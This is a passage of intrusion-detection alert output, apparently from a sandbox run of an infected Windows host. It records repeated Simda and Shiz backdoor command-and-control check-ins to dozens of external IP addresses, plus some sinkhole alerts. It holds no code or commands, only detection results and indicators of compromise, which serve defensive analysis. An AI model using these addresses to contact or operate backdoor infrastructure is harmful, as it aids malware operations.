Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:48:36.648362+0200
SID:	2804852
Severity:	1
Source Port:	64302
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:03.985127+0200
SID:	2803437
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:03.985127+0200
SID:	2804852
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:48:59.281482+0200
SID:	2803437
Severity:	1
Source Port:	56388
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:48:59.281482+0200
SID:	2804852
Severity:	1
Source Port:	56388
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:48:59.413638+0200
SID:	2803437
Severity:	1
Source Port:	56388
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:48:59.413638+0200
SID:	2804852
Severity:	1
Source Port:	56388
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:47:36.458145+0200
SID:	2803437
Severity:	1
Source Port:	51122
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 13.248.169.48

Timestamp:	2024-08-23T18:47:36.458145+0200
SID:	2804852
Severity:	1
Source Port:	51122
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:51.818588+0200
SID:	2803437
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:51.818588+0200
SID:	2804852
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:47:42.176201+0200
SID:	2803437
Severity:	1
Source Port:	50751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:47:42.176201+0200
SID:	2804852
Severity:	1
Source Port:	50751
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:48:59.323898+0200
SID:	2803437
Severity:	1
Source Port:	56383
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:48:59.323898+0200
SID:	2804852
Severity:	1
Source Port:	56383
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:47:39.441428+0200
SID:	2803437
Severity:	1
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.85.183.50

Timestamp:	2024-08-23T18:47:39.441428+0200
SID:	2804852
Severity:	1
Source Port:	51130
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:48:59.921822+0200
SID:	2803437
Severity:	1
Source Port:	56395
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:48:59.921822+0200
SID:	2804852
Severity:	1
Source Port:	56395
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:47:52.202984+0200
SID:	2803437
Severity:	1
Source Port:	64273
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:47:52.202984+0200
SID:	2804852
Severity:	1
Source Port:	64273
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz - Source IP: 44.221.84.105 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.520199+0200
SID:	2018141
Severity:	1
Source Port:	80
Destination Port:	60209
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 44.221.84.105 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:01.520199+0200
SID:	2037771
Severity:	1
Source Port:	80
Destination Port:	60209
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:52.358805+0200
SID:	2804852
Severity:	1
Source Port:	64278
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:48:51.936053+0200
SID:	2803437
Severity:	1
Source Port:	50116
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:48:51.936053+0200
SID:	2804852
Severity:	1
Source Port:	50116
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:53.392700+0200
SID:	2803437
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:53.392700+0200
SID:	2804852
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:47:38.393681+0200
SID:	2803437
Severity:	1
Source Port:	51128
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.182.252

Timestamp:	2024-08-23T18:47:38.393681+0200
SID:	2804852
Severity:	1
Source Port:	51128
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:16.822889+0200
SID:	2803437
Severity:	1
Source Port:	49663
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:16.822889+0200
SID:	2804852
Severity:	1
Source Port:	49663
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:51.597286+0200
SID:	2803437
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:51.597286+0200
SID:	2804852
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:04.530284+0200
SID:	2804852
Severity:	1
Source Port:	49661
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:01.778689+0200
SID:	2803437
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:47:01.778689+0200
SID:	2804852
Severity:	1
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:48:11.489069+0200
SID:	2803437
Severity:	1
Source Port:	64284
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:48:11.489069+0200
SID:	2804852
Severity:	1
Source Port:	64284
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:20.835861+0200
SID:	2803437
Severity:	1
Source Port:	49663
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.97.3

Timestamp:	2024-08-23T18:47:20.835861+0200
SID:	2804852
Severity:	1
Source Port:	49663
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:48:36.316287+0200
SID:	2803437
Severity:	1
Source Port:	64300
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 64.225.91.73

Timestamp:	2024-08-23T18:48:36.316287+0200
SID:	2804852
Severity:	1
Source Port:	64300
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:47:52.143521+0200
SID:	2803437
Severity:	1
Source Port:	64277
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:47:52.143521+0200
SID:	2804852
Severity:	1
Source Port:	64277
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:48:24.867558+0200
SID:	2803437
Severity:	1
Source Port:	64292
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.150.11.230

Timestamp:	2024-08-23T18:48:24.867558+0200
SID:	2804852
Severity:	1
Source Port:	64292
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:47:01.793323+0200
SID:	2803437
Severity:	1
Source Port:	49652
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.94.10.34

Timestamp:	2024-08-23T18:47:01.793323+0200
SID:	2804852
Severity:	1
Source Port:	49652
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:01.437661+0200
SID:	2804852
Severity:	1
Source Port:	56397
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:47:41.579995+0200
SID:	2803437
Severity:	1
Source Port:	50750
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 72.52.179.174

Timestamp:	2024-08-23T18:47:41.579995+0200
SID:	2804852
Severity:	1
Source Port:	50750
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:48:59.222909+0200
SID:	2803437
Severity:	1
Source Port:	56384
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:48:59.222909+0200
SID:	2804852
Severity:	1
Source Port:	56384
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:51.662556+0200
SID:	2803437
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 208.100.26.245

Timestamp:	2024-08-23T18:47:51.662556+0200
SID:	2804852
Severity:	1
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:51.953230+0200
SID:	2803437
Severity:	1
Source Port:	64271
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:51.953230+0200
SID:	2804852
Severity:	1
Source Port:	64271
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:47:38.714787+0200
SID:	2803437
Severity:	1
Source Port:	51129
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 103.224.212.210

Timestamp:	2024-08-23T18:47:38.714787+0200
SID:	2804852
Severity:	1
Source Port:	51129
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:48:24.316430+0200
SID:	2803437
Severity:	1
Source Port:	64291
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:48:24.316430+0200
SID:	2804852
Severity:	1
Source Port:	64291
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:03.680235+0200
SID:	2804852
Severity:	1
Source Port:	56400
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:51.938477+0200
SID:	2803437
Severity:	1
Source Port:	64274
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:51.938477+0200
SID:	2804852
Severity:	1
Source Port:	64274
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:04.229267+0200
SID:	2803437
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:04.229267+0200
SID:	2804852
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:01.471543+0200
SID:	2803437
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:01.471543+0200
SID:	2804852
Severity:	1
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:47:01.607947+0200
SID:	2803437
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 162.255.119.102

Timestamp:	2024-08-23T18:47:01.607947+0200
SID:	2804852
Severity:	1
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:48:59.424615+0200
SID:	2803437
Severity:	1
Source Port:	56384
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 3.64.163.50

Timestamp:	2024-08-23T18:48:59.424615+0200
SID:	2804852
Severity:	1
Source Port:	56384
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:48:59.226341+0200
SID:	2803437
Severity:	1
Source Port:	56387
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 18.208.156.248

Timestamp:	2024-08-23T18:48:59.226341+0200
SID:	2804852
Severity:	1
Source Port:	56387
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:47:15.205704+0200
SID:	2803437
Severity:	1
Source Port:	49658
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 5.79.71.225

Timestamp:	2024-08-23T18:47:15.205704+0200
SID:	2804852
Severity:	1
Source Port:	49658
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:01.882748+0200
SID:	2803437
Severity:	1
Source Port:	49653
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 172.234.222.143

Timestamp:	2024-08-23T18:47:01.882748+0200
SID:	2804852
Severity:	1
Source Port:	49653
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:49:00.250436+0200
SID:	2803437
Severity:	1
Source Port:	56394
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 85.17.31.122

Timestamp:	2024-08-23T18:49:00.250436+0200
SID:	2804852
Severity:	1
Source Port:	56394
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:51.929926+0200
SID:	2803437
Severity:	1
Source Port:	64272
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:47:51.929926+0200
SID:	2804852
Severity:	1
Source Port:	64272
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:49:02.104297+0200
SID:	2803437
Severity:	1
Source Port:	56399
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:49:02.104297+0200
SID:	2804852
Severity:	1
Source Port:	56399
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:53.751639+0200
SID:	2803437
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 154.212.231.82

Timestamp:	2024-08-23T18:47:53.751639+0200
SID:	2804852
Severity:	1
Source Port:	49660
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:00.145020+0200
SID:	2803437
Severity:	1
Source Port:	56385
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:00.145020+0200
SID:	2804852
Severity:	1
Source Port:	56385
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:03.182843+0200
SID:	2803437
Severity:	1
Source Port:	56385
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:49:03.182843+0200
SID:	2804852
Severity:	1
Source Port:	56385
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:47:47.291874+0200
SID:	2803437
Severity:	1
Source Port:	63803
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 52.34.198.229

Timestamp:	2024-08-23T18:47:47.291874+0200
SID:	2804852
Severity:	1
Source Port:	63803
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	2024-08-23T18:47:00.273297+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	53004
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:51.839405+0200
SID:	2803437
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-08-23T18:47:51.839405+0200
SID:	2804852
Severity:	1
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32.Shiz.ivr Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:36.203452+0200
SID:	2803437
Severity:	1
Source Port:	64298
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-08-23T18:48:36.203452+0200
SID:	2804852
Severity:	1
Source Port:	64298
Destination Port:	80
